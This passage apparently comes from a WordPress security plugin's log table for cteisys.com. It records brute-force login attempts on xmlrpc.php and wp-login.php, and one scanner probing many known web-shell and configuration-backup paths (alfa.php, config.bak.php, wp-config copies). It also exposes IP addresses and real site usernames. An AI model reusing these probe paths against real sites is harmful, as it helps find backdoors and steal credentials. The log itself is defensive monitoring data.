isys.com/wp-login.php',0,0,0),('31.184.242.14',532214286,'newd',0,1664603134.7595,152,'fjBhJGoW6KgAQ4msXz0UcaxZ','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('80.74.145.155',1347064219,'newd',0,1664603145.1439,7,'S34RwEAL5PuKJNDGFnjabZVk','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('52.178.114.226',884110050,'newd',0,1664603148.6138,7,'QvYMPJfwWR9X23opc6jA8B1N','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('139.180.158.189',2343870141,'newd',0,1664603154.2873,7,'TN0qw2dVGeBzW6cpEkPJQnal','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('52.172.40.95',883697759,'newd',0,1664603161.3045,7,'M0eEVXuPxLrUoR1WCbNtnY6i','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('47.94.219.115',794745715,'newd',0,1664603169.4888,7,'29AYtmfHqe7r54QL3glJ6VCz','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('104.251.216.88',1761335384,'newd',0,1664603171.2762,7,'IGdWUsBThgp37FKLbcHekaE9','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('194.163.156.168',3265502376,'newd',0,1664603287.2565,152,'7rpNMiKJFI8Dk1COAY3aSdfR','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('147.139.178.177',2475406001,'newd',0,1664603585.6719,152,'YlqxD231d9Cti8fXpomzJ7rQ','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('194.163.156.168',3265502376,'newd',0,1664603769.8828,152,'c7bDHJlNSk08UaguqKOIotn3','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('103.116.16.173',1735659693,'newd',0,1664603898.5370,152,'Ufw864QO1zJxDCtKXsmZ5S0B','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('103.116.16.173',1735659693,'newd',0,1664605606.9343,152,'v2xIa1itjTy0mQAOksPH58Nf','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('39.106.15.209',661262289,'newd',0,1664605861.3493,152,'AEuYHl8Z0bSokMXQD4gw5WPc','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('196.50.5.129',3291612545,'',0,1664605970.4626,55,'G3eqIpBgklDOUWhdRm452rSf','','19|0|0|0|mail.cteisys.com/owa/auth/logon.aspx',0,19,0),('196.50.5.129',3291612545,'',0,1664605974.0944,55,'LrhlxTVEf9bJCF6X5dQ8pgiN','','19|0|0|0|cteisys.com/owa/auth/logon.aspx',0,19,0),('196.50.5.129',3291612545,'',0,1664605975.3793,55,'5376gC0bxVrsAfplUWcwvTGM','','19|0|0|0|cteisys.com/owa/auth/logon.aspx',0,19,0),('154.0.165.146',2583733650,'newd',0,1664606140.1997,152,'owzVQ14GxD3s2kmTOnM7ltjy','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('72.9.158.112',1208589936,'newd',0,1664606288.6913,152,'cwl9bNTPOUFDrtsYy7KkgZxX','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('209.141.46.253',3515690749,'newd',0,1664606470.5390,7,'5hmLG03gfF9JepqtKBuz8RVb','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('61.222.243.149',1038021525,'admin',0,1664607467.7100,152,'d4yMoCkpaWTFIHXY79LNDtmx','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('209.141.36.190',3515688126,'nathaniel-lipka',0,1664607518.0612,51,'YQZeqk3mScnf7J2r5iCXBoD0','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('62.109.150.208',1047369424,'newd',0,1664608102.4596,7,'VdKSycGa1QzITWDNBHYifRJP','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('31.184.242.14',532214286,'newd',0,1664608370.0666,152,'wPHDLFkJ57jNfqY0ZWduXs8U','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('213.152.161.35',3583549731,'joyce',0,1664608539.1052,152,'o7Ak36HvshOR8fdrneYMa2VW','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('208.109.214.179',3496859315,'newd',0,1664608547.7540,152,'SA8pf3FYNi9HVPmwd2r5Kojh','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('209.141.37.194',3515688386,'Joyce',0,1664608664.1489,51,'GzgcKyuUZaM3xhsDQbm7Wl4d','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('66.29.138.73',1109232201,'newd',0,1664608942.1185,152,'raYLGZXxgchidTJIulVsw2vt','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('159.65.219.142',2671893390,'newd',0,1664609097.1416,152,'4OTVwY1CdSty0qkJepfmNQa5','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('116.68.196.90',1950663770,'newd',0,1664609313.1834,152,'JZBCfal1pk7z8TtYsUuPeFmv','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('149.255.62.28',2516532764,'newd',0,1664609487.1745,152,'8umIVnLaR2DrpJlGiPsETMHW','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('134.19.179.163',2249438115,'joyce',0,1664609526.4200,152,'tUOEaof7H2qX0nzd9cvIpiWC','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('209.141.37.194',3515688386,'newd',0,1664609555.6147,7,'Cj3pfAeBEczU6YTv7ZKwLFsX','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('144.208.67.117',2429567861,'newd',0,1664609684.6113,152,'AH8rzL7FU3TjaqGIh6clRX5y','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('194.42.98.32',3257557536,'newd',0,1664610084.0800,152,'T9Feh4Lq2tcrlAvydniZSYU8','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('119.8.58.8',1997027848,'newd',0,1664610238.2058,152,'N0QGqMcAFpR15tkHx9hveBP4','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('112.78.4.244',1884161268,'newd',0,1664610447.0483,152,'fezU5HtmsruwKnD8LTCi19da','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('162.214.123.41',2731965225,'newd',0,1664610637.9396,152,'BIOH7De01uKm2FCiXdyNEZGP','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('111.90.145.188',1868206524,'newd',0,1664610837.0736,152,'ZneHRg8iJO2mPF1Gk9bNCDLB','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('72.167.225.151',1218961815,'newd',0,1664611017.0543,152,'Is74REifNpx5UDCLYkMrXQ9A','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('35.198.25.12',600185100,'newd',0,1664611421.2084,152,'pRgB9ixPADes8bvLqS2F4umG','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('52.178.114.226',884110050,'newd',0,1664612645.0154,7,'C4uUdxPHf2Ln6sgeTjcmSZaQ','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('89.233.5.168',1508443560,'newd',0,1664612656.1069,7,'4F72UrR3Kx6CQfkuvznlmdcD','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('182.79.46.50',3058642482,'newd',0,1664612656.3862,7,'85x7ijPgQf4hR3y2kz9rtuw6','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('222.124.3.203',3732669387,'newd',0,1664612657.0051,7,'LMENyTSx52bZc9KsIeofDiak','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('185.210.145.8',3117584648,'newd',0,1664612661.5987,7,'HsCUMRviEzjZ20TxOYIeK8lX','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('64.64.237.75',1077996875,'newd',0,1664612661.8022,7,'AMRtn8yXrKENCkbg3UYWjxVB','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('193.105.234.82',3244943954,'newd',0,1664612669.7485,7,'kvjCetuaMPw7EgU0YT1qrxil','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('217.21.74.40',3642051112,'newd',0,1664612675.0905,7,'DYLZq3mcGhpC1B7OR4leTKvV','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('134.122.42.249',2256153337,'newd',0,1664612680.9703,7,'Vl3DhsEqwH6Up95PBuonZOxY','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('23.97.183.204',392280012,'newd',0,1664612684.4089,7,'cb0gRfHq62Da8TOCvjBuF5mM','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('35.193.197.89',599901529,'newd',0,1664612860.8308,152,'Fbk1u7nR8ZeaP2yt4gTAVism','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('35.198.25.12',600185100,'newd',0,1664613252.7785,152,'ENDMyChX9ViP8zjb0Sk4u3Lp','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('101.99.90.175',1701010095,'newd',0,1664613447.1127,152,'TrC9etb64FsMEunq7U1ihO2Z','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('209.141.48.210',3515691218,'newd',0,1664613528.8244,7,'hwqgZsGHM58NROPdYpVJ2zIv','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('128.199.68.99',2160542819,'newd',0,1664613670.0902,152,'xb2CzmKSGIBtg03M5WoDTQ7Y','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('159.89.170.41',2673453609,'newd',0,1664613851.9561,152,'s5xV1pY0rKBGe9UXWZg4SvIo','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('209.141.56.13',3515693069,'nathaniel-lipka',0,1664614033.5275,51,'FEXpRaYuDj0bdPwJWMzrH2mo','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('192.99.34.140',3227722380,'newd',0,1664614088.1287,152,'LG95Z0NWTcaQf6u3EBAHC8sg','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('104.244.77.192',1760841152,'nathaniel-lipka',0,1664614226.4423,51,'TtXesxR3iFC9vcEbYUBfMSKj','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('3.131.4.125',58918013,'newd',0,1664614523.9544,152,'U8fICEMGkbRAQTtjO1Lh6Pyu','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('95.111.225.89',1601167705,'newd',0,1664614697.0679,152,'Zoj8B4TDpE6mFQVauJn9Nryc','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('34.64.218.102',574675558,'newd',0,1664617258.9921,152,'ZrMb4WRn8fil2X36HVm0wjJ7','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('82.165.184.76',1386592332,'newd',0,1664617530.3045,152,'4ODVSIfHZzMQTb7RqujLcC9K','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('128.199.109.135',2160553351,'newd',0,1664617699.8267,152,'qZmciYwB20Kv5f8EADQhxyWN','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('162.215.217.77',2732054861,'newd',0,1664618166.9831,152,'ihlPxjnqy6WpQUVNgF3dzH4S','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('193.107.158.16',3245055504,'newd',0,1664618379.6202,152,'i9QMr84l6SyYbIChjetf1KNF','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('213.165.237.48',3584421168,'newd',0,1664620396.1048,152,'lXUW3SwiqQIkvTfJVuHb9xsp','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('87.236.20.180',1475089588,'newd',0,1664620627.2065,152,'i0PrnVsQxWcR4lzJBAt3EuTN','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('74.208.103.228',1255172068,'newd',0,1664620823.1732,152,'O8xF9vlIBMgqPVcCJtdKyaAU','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('31.210.66.35',533873187,'newd',0,1664621284.8971,152,'Kao3qRzftLrPb5iJTQE69MNS','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('45.125.239.179',763228083,'newd',0,1664621513.7763,152,'QXUHdDLCgkPce02b1o4TtKu3','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('184.154.69.85',3097118037,'newd',0,1664621723.3948,152,'UsEdj4XxFvaKeCoh0TVm2rHD','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('103.74.120.192',1732933824,'newd',0,1664621973.7787,152,'dBlAs51ubiqxhgeDPyCTLwnZ','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('103.171.180.165',1739306149,'newd',0,1664628081.0848,152,'vTFrxiGIcgP2hXALqNZEz71d','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('37.187.24.159',633018527,'newd',0,1664628335.4566,152,'9jgcwCmk7xIdtHe3fyNFR6Sp','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('128.199.205.115',2160577907,'newd',0,1664628525.9243,152,'qr4B5THIwDs23p9VzgbGCdXA','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('54.38.44.6',908471302,'newd',0,1664628826.4464,152,'RmaJnuhvILP2O3ok9qS4dzGx','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('103.116.16.173',1735659693,'newd',0,1664629007.4282,152,'7XiqyDAzUZv9x3mbLIWakCJs','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('194.38.20.161',3257275553,'',0,1664629235.9988,55,'LIvUuS9e7wfdoO8YNkVDC06W','','19|0|0|0|cteisys.com/wp-content/themes/magnitudo/framework/_scripts/valums_uploader/php.php',0,19,0),('91.224.23.225',1541412833,'newd',0,1664630988.9031,152,'fVGkz2OKgDLQSdZ9XjC6F70Y','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('185.225.33.99',3118539107,'newd',0,1664631239.2850,152,'hgWudtFHxrjs2187vynJX0eO','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('180.149.241.246',3029725686,'newd',0,1664631456.2122,152,'nCNjrvsIxFw94fmckdlOJHKP','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('107.180.103.185',1806985145,'newd',0,1664631725.0996,152,'jwOfldaHXIcxRtTeYG9Es2UA','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('165.232.183.66',2783491906,'newd',0,1664632200.9215,152,'l7nephz9wd2CIaWXDGtJQNLO','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('62.210.181.102',1053996390,'newd',0,1664632401.6102,152,'JVmoI1TADSNHCFi7krRqvhYs','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('95.111.225.89',1601167705,'newd',0,1664632690.4316,152,'cfox91t8ymYbnCwlhXdujTz0','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('190.171.170.94',3198921310,'newd',0,1664635173.2386,152,'ErDxKgad34WOX7cpLlUujRQz','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('51.75.146.208',860590800,'newd',0,1664635410.6569,152,'G17kiKbhOaXsV3dSHqx8fWNL','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('185.197.195.173',3116745645,'newd',0,1664635697.5912,152,'6xnQPpd3M4TCLqo9hG8Xa2U5','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('111.90.150.171',1868207787,'newd',0,1664635904.9937,152,'r4qSBGnikz9ox6lWUg3jT5tp','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('192.163.194.31',3231957535,'newd',0,1664638376.1589,152,'i2kuRBFmXWHGn9aOrMYSLEDq','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('162.219.250.15',2732325391,'newd',0,1664638882.9255,152,'LdWDqj3Cywpa4Zx5RTnPEISG','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('5.101.156.219',90545371,'newd',0,1664639173.3965,152,'yuTBjRQrnM9NpXaCoWk2b37I','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('198.98.50.216',3328324312,'newd',0,1664639268.6759,7,'i1s2vUKT6Wd9RAaOmeh34nkQ','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('123.31.41.38',2065639718,'newd',0,1664639361.5311,152,'UbOz1dC59Ywpr6aIMuQlfLyD','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('95.167.178.158',1604825758,'newd',0,1664639659.2522,152,'c4xGVD1CoQRqdfNyYnw0ikj7','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('195.93.152.83',3277690963,'newd',0,1664639895.1348,152,'frpHvSVejl1y972EGMIK6FXW','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('20.198.3.243',348521459,'newd',0,1664640956.3080,152,'mK3EavrqwZjVGL9SxCM2hioz','','0|0|0|0|cteisys.com//xmlrpc.php',0,0,0),('192.163.195.60',3231957820,'newd',0,1664641153.4189,152,'YWdrKCAw8f5xmGkuPqzTXLoM','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('150.230.247.143',2531719055,'newd',0,1664641398.8309,152,'3yXrxf2cWqTLB9NM4ouRj7pZ','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('87.106.229.31',1466623263,'newd',0,1664641646.4656,152,'4MrAZqho7eRCzFnSdPkDjiYl','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('95.173.161.171',1605214635,'newd',0,1664641880.2247,152,'PqyinTLfSWaJ2NzGHt3rjmeE','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('123.31.21.26',2065634586,'newd',0,1664642134.3778,152,'iQoKlDC07Sn4c9qUe8hvsuZT','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('103.90.235.70',1734011718,'newd',0,1664642629.9320,152,'Rp95twyP7qkBHNYguvsxMSlK','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('209.141.48.210',3515691218,'newd',0,1664642674.6419,7,'a1P5jFfWgEeTlLJhGwbVHmpQ','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('116.203.131.1',1959494401,'',0,1664642771.4308,55,'CKeMSyuYBc42amoWrfiHIU1k','','19|0|0|0|cteisys.com/style.php',0,19,0),('116.203.131.1',1959494401,'',0,1664642774.0127,55,'HxS51LgBwurnVNWQEhcU0fsG','','19|0|0|0|cteisys.com/moduless.php',0,19,0),('116.203.131.1',1959494401,'',0,1664642777.5422,55,'tZOSDP0nwCQcFgfoXlzVeG4m','','19|0|0|0|cteisys.com/wp-content/plugins/t_file_wp/t_file_wp.php',0,19,0),('116.203.131.1',1959494401,'',0,1664642780.9599,55,'Kjivh52G0gE9qSNuHOtreTm8','','19|0|0|0|cteisys.com/admin.php',0,19,0),('116.203.131.1',1959494401,'',0,1664642829.5943,55,'HF4B12gLi3xRIfNqeDmK7hCd','','19|0|0|0|cteisys.com/boom.php',0,19,0),('116.203.131.1',1959494401,'',0,1664642829.5970,10,'HF4B12gLi3xRIfNqeDmK7hCd','','707|0|0|0|cteisys.com/boom.php',0,707,0),('116.203.131.1',1959494401,'',0,1664642833.3176,55,'E0GLwbAvMUqZ69VXtxuFRKyi','','19|0|0|0|cteisys.com/wp-content/plugins/backup_index.php',0,19,0),('116.203.131.1',1959494401,'',0,1664642838.6465,55,'ldJrhxtYNs7vAC3jLDgb1RFK','','19|0|0|0|cteisys.com/wp-content/db_cache.php',0,19,0),('116.203.131.1',1959494401,'',0,1664642843.7928,100,'muSyBYTkP0ibIoxjdeh35XOz','','13|0|0|0|cteisys.com/wp-content/plugins/ioptimization/IOptimize.php',0,13,0),('116.203.131.1',1959494401,'',0,1664642846.3836,100,'1ONY8nIDf3ZpKJcokdCQS9yX','','13|0|0|0|cteisys.com/xmlrp.php',0,13,0),('116.203.131.1',1959494401,'',0,1664642854.0073,100,'FEZ6zrJlO7VnUSDaL2cjIBKy','','13|0|0|0|cteisys.com/wpindex.php',0,13,0),('47.106.201.134',795527558,'newd',0,1664642855.5122,152,'iYqZy4px0VQRESBt6jc1XozL','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('116.203.131.1',1959494401,'',0,1664642855.8893,100,'yDSUbA1jKWtpln0z5ZRi4PgL','','13|0|0|0|cteisys.com/larva.php',0,13,0),('116.203.131.1',1959494401,'',0,1664642857.6533,100,'sAqYlMoN5vuzCihIfbVdD7Rt','','13|0|0|0|cteisys.com/th3_err0r.php',0,13,0),('116.203.131.1',1959494401,'',0,1664642864.1269,55,'jMWsh48iO9yTtq76CH1Qn5cv','','19|0|0|0|cteisys.com/alfindex.php',0,19,0),('116.203.131.1',1959494401,'',0,1664642866.8207,55,'9R8xrkoQzSMGZNPBvdfDJO2K','','19|0|0|0|cteisys.com/alfa.php',0,19,0),('116.203.131.1',1959494401,'',0,1664642869.7668,55,'NAexrZsTRtv3cSbwykFB4YJm','','19|0|0|0|cteisys.com/wp-booking.php',0,19,0),('116.203.131.1',1959494401,'',0,1664642872.7380,55,'YzkMQsjF5wtq6roNb3GmauB0','','19|0|0|0|cteisys.com/cindex.php',0,19,0),('116.203.131.1',1959494401,'',0,1664642875.2404,55,'EgdKWQHGIL4lTre8aNPUOXw9','','19|0|0|0|cteisys.com/wp-content/wp-1ogin_bak.php',0,19,0),('116.203.131.1',1959494401,'',0,1664642878.0427,55,'5RIEUCykFB7z9mhSjuq2wtao','','19|0|0|0|cteisys.com/wp-1ogin_bak.php',0,19,0),('116.203.131.1',1959494401,'',0,1664642889.3339,55,'br6zpFdl3tBCX25NvLAKGjTJ','','19|0|0|0|cteisys.com/wp-includes/fonts/css.php',0,19,0),('116.203.131.1',1959494401,'',0,1664642898.0478,55,'XsIDCriWp7v3FaqMNRhz0bYO','','19|0|0|0|cteisys.com/wp-includes/css/css.php',0,19,0),('116.203.131.1',1959494401,'',0,1664642901.1056,55,'Dlc9kd6X8WEbBanq4suxih3J','','19|0|0|0|cteisys.com/old-index.php',0,19,0),('116.203.131.1',1959494401,'',0,1664642907.7251,55,'AC9yJmQv486qXI0DlWwSzuYo','','19|0|0|0|cteisys.com/config.bak.php',0,19,0),('116.203.131.1',1959494401,'',0,1664642912.6203,55,'UdA0h4fPp7Rk68ZcKnoC5GQE','','19|0|0|0|cteisys.com/wp-admin/config.bak.php',0,19,0),('116.203.131.1',1959494401,'',0,1664642922.2164,55,'4S1jHsiVMLd6D8hlOX3n0Rf7','','19|0|0|0|cteisys.com/wp-content/config.bak.php',0,19,0),('116.203.131.1',1959494401,'',0,1664642926.1943,55,'t8OhjANl5ILBvua4Hr79YPU3','','19|0|0|0|cteisys.com/wp-includes/config.bak.php',0,19,0),('116.203.131.1',1959494401,'',0,1664642930.1023,55,'nuFfjvl9y8Pk4o7xXbMZ5DgT','','19|0|0|0|cteisys.com/wp-content/themes/config.bak.php',0,19,0),('116.203.131.1',1959494401,'',0,1664642932.0348,55,'1uwS0zxbHf7Y54anWCkolTg2','','19|0|0|0|cteisys.com/wp-content/plugins/config.bak.php',0,19,0),('116.203.131.1',1959494401,'',0,1664642943.4349,18,'V6E7iW5T1SendPcahuqm3Q4D','','13|0|0|0|cteisys.com/wp-includes/css/wp-config.php',0,13,0),('116.203.131.1',1959494401,'',0,1664642945.2808,55,'kz3AQCg1mFKYwixWqo54PEUs','','19|0|0|0|cteisys.com/wp-content/plugins/ubh/up.php',0,19,0),('116.203.131.1',1959494401,'',0,1664642947.2597,100,'2weAFSToLWp5KGOvZaYgDyqk','','13|0|0|0|cteisys.com/wp-includes/wpconfig.bak.php',0,13,0),('116.203.131.1',1959494401,'',0,1664642953.5899,100,'JDjcd9yQxtV0pZbGfg4T23ar','','13|0|0|0|cteisys.com/wp-content/plugins/wpconfig.bak.php',0,13,0),('116.203.131.1',1959494401,'',0,1664642964.5175,55,'yI3rdVKaFPXfQp0mhYgEwtNM','','19|0|0|0|cteisys.com/haders.php',0,19,0),('116.203.131.1',1959494401,'',0,1664642967.2470,100,'zbEetuYDspmVciXFwjB8AfqI','','13|0|0|0|cteisys.com/wp-content/wp-old-index.php',0,13,0),('116.203.131.1',1959494401,'',0,1664642970.5138,55,'jfEtod72nXDpOPTYRz4G8CeS','','19|0|0|0|cteisys.com/legion.php',0,19,0),('116.203.131.1',1959494401,'',0,1664642978.1462,55,'YJDpEA6UhIPXRTtjQ5H403BM','','19|0|0|0|cteisys.com/wp-content/mu-plugins/db-safe-mode.php',0,19,0),('116.203.131.1',1959494401,'',0,1664642981.7674,55,'bPextvlpNVQJKrIMTiZwhBYs','','19|0|0|0|cteisys.com/wp-includes/lfx.php',0,19,0),('116.203.131.1',1959494401,'',0,1664642984.3136,55,'FUveWSDZupqL8g47zR26h0cC','','19|0|0|0|cteisys.com/wp-includes/small.php',0,19,0),('116.203.131.1',1959494401,'',0,1664642986.7266,55,'V3C7oMbe0gkRcindtYvKxGFm','','19|0|0|0|cteisys.com/up.php',0,19,0),('116.203.131.1',1959494401,'',0,1664642989.3282,55,'hFiB6NtZVeOk7nEpTsWQ4xlq','','19|0|0|0|cteisys.com/upload.php',0,19,0),('116.203.131.1',1959494401,'',0,1664642994.0275,55,'W3285TXaqvf6JRNPon47ULxe','','19|0|0|0|cteisys.com/config.php',0,19,0),('116.203.131.1',1959494401,'',0,1664642996.4131,100,'jAVYhZnt6EBw8pIvl5FzPCsX','','13|0|0|0|cteisys.com/test.php',0,13,0),('116.203.131.1',1959494401,'',0,1664642998.6440,55,'l1zOfNIQkvsU754yVbaigMRB','','19|0|0|0|cteisys.com/wp-content/langar.php',0,19,0),('116.203.131.1',1959494401,'',0,1664643005.5401,55,'juRWvp5XcSaNUCBQAmtGho8i','','19|0|0|0|cteisys.com/wp-content/plugins/fancy-product-designer/inc/custom-image-handler.php',0,19,0),('139.59.117.30',2335929630,'newd',0,1664643135.6898,152,'ulzQZ2IU8OpK1N5PgRDvAs4h','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('167.99.78.164',2808303268,'newd',0,1664643359.8040,152,'qV3zZPL0aDGYhkSipNI6jwQK','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('87.106.229.31',1466623263,'newd',0,1664644681.0224,152,'HoxMOs74XIa5bkyp6VlhEtFR','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('38.242.205.84',653446484,'newd',0,1664644921.6775,152,'ebiyE2L1nKwIqYl0hGHPMRjo','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('125.227.29.249',2112036345,'newd',0,1664645184.1090,152,'PeczZ7JXf9wgutjndTUi06yE','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('159.89.170.41',2673453609,'newd',0,1664645952.0590,152,'1sbzxwLoS03VOFtNUQGvj8ha','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('87.106.229.31',1466623263,'newd',0,1664646231.6826,152,'JI73xyPjfn458HYXCgpkqruN','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('180.149.241.246',3029725686,'newd',0,1664646465.0633,152,'jHPKkhe9SNumlg2DM1WBOUIb','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('45.149.77.114',764759410,'newd',0,1664646984.9311,152,'bJudOcTLPZDmGSfYgq6C7XH2','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('205.185.116.162',3451483298,'nathaniel-lipka',0,1664647051.1871,51,'8d03sZUNO6wyuJYamkjqRfbM','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('192.190.221.75',3233733963,'',0,1664647409.3947,55,'3jVf2oT4ry1etZ0HzpOUgMI8','','19|0|0|0|cteisys.com///installer.php',0,19,0),('192.190.221.75',3233733963,'',0,1664647410.4181,55,'Bd8Z2UMAshDbJVEaf9K3IwgH','','19|0|0|0|cteisys.com///installer-backup.php',0,19,0),('192.190.221.75',3233733963,'',0,1664647411.5142,55,'k3AUb72ZEOrNyujRxI0sYKQF','','19|0|0|0|cteisys.com///dup-installer/main.installer.php',0,19,0),('103.90.232.106',1734010986,'newd',0,1664648512.2507,152,'4c2sGBUYmzqOKxJfnIAhjwPF','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('176.9.41.169',2953390505,'',0,1664648788.6827,55,'6Nhsx285MWVrZ94Eq3cBfRdI','','19|0|0|0|www.cteisys.com/wp-includes/wp-class.php',0,19,0),('176.9.41.169',2953390505,'',0,1664648791.8580,55,'2h8AE3ezCNJRxou0fmQa16sv','','19|0|0|0|www.cteisys.com/wp-includes/wp-class.php',0,19,0),('162.240.216.162',2733693090,'newd',0,1664649056.7628,152,'QiMHz6f5rnDbq2lvu3BNawSX','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('111.223.36.152',1876894872,'newd',0,1664649318.1264,152,'BParpn7XdUMhGtjuLNA9Il0i','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('194.42.98.32',3257557536,'newd',0,1664649558.6006,152,'JnpE278MgLCWaRGhDt4QemU6','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('198.38.88.250',3324401914,'newd',0,1664649836.0131,152,'xJshuDWOca9CN2AyHdtRQEYr','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('67.222.131.158',1138656158,'newd',0,1664650054.7408,152,'tOlmQynDfvArY3skXbPaBEMU','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('149.129.181.108',2508305772,'newd',0,1664650589.1773,152,'sgtayrY920uEG7KhnAmoVeTM','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('176.9.41.169',2953390505,'',0,1664651111.5960,55,'gYULaymJP2rRBlOVZFnH5joA','','19|0|0|0|cteisys.com/wp-includes/wp-class.php',0,19,0),('176.9.41.169',2953390505,'',0,1664651116.9853,55,'gHANjY48cSJduTpLBDePOWXn','','19|0|0|0|cteisys.com/wp-includes/wp-class.php',0,19,0),('54.38.44.6',908471302,'newd',0,1664651425.4993,152,'BNUAkOxTpFI